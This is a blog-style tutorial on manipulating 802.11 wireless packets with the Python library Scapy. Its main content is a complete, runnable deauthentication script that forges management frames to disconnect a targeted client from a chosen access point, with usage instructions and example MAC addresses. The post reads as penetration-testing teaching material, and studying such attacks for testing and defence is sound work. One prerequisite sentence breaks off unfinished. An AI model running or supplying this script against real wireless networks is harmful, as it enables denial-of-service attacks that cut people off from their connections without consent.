802.11 Protocol - Python Scripting

Introduction

In the previous blog post we begun diving into the wonderful world of 802.11 protocol.  802.11 is a protocol for defining a set of media access controls and physical layer specifications for implementing a wireless LAN access.  What is most commonly known as wireless technology.  In this blog post we will be looking at using a popular Python module named Scapy to manipulate, craft, and send 802.11 packets over the air.  

There are some prerequisites if you plan on following along with this blog post, and trying some of the code written here.  The code should work on most Debian Linux systems.  I will be using Kali Linux for my testing since I use that most days. Additionally, you will need Python and the Scapy module.  You can install the Scapy module using a Python package installer such as Pip or Easy_Install.  Finally, you will need a wireless interface card that can support monitor mode.  You can find instructions on

Scapy

Scapy is a powerful Python-based interactive packet manipulation program and library.  It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, store or read them using pcap files, match requests and replies, and much more. It is designed to allow fast packet prototyping by using default values that work.

Management Frame

Python Deauthentication Packet

#!/usr/bin/env python

from scapy.all import *
import sys

def deauth(iface,bssid,client,count):
   packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
   for n in range(int(count)):
      sendp(packet)
      print 'Deauth sent via: '+iface+' to BSSID: '+bssid+' for Client: '+client


if __name__ == "__main__":
   if len(sys.argv) !=5:
      print 'Usuage is - ./deauth.py interface bssid client count'
      print 'Example - ./deauth.py wlan0mon 00:11:22:33:44:55 55:44:33:22:11:00 4'
      sys.exit(1)

   # The interface that you want to send packets out of (monitor mode)
   conf.iface = sys.argv[1]
   # the BSSID of the Wireless Access Point you want to target
   bssid = sys.argv[2]
   # The MAC address of the Client you want to kick off the Access Point
   client = sys.argv[3] 
   # The number of deauth packets you want to send
   count = sys.argv[4] 
   # Used to supress scapy output return
   conf.verb = 0

   # run the deauth function
   deauth(conf.iface,bssid,client,count)

Data Frame and Control Frame coming later.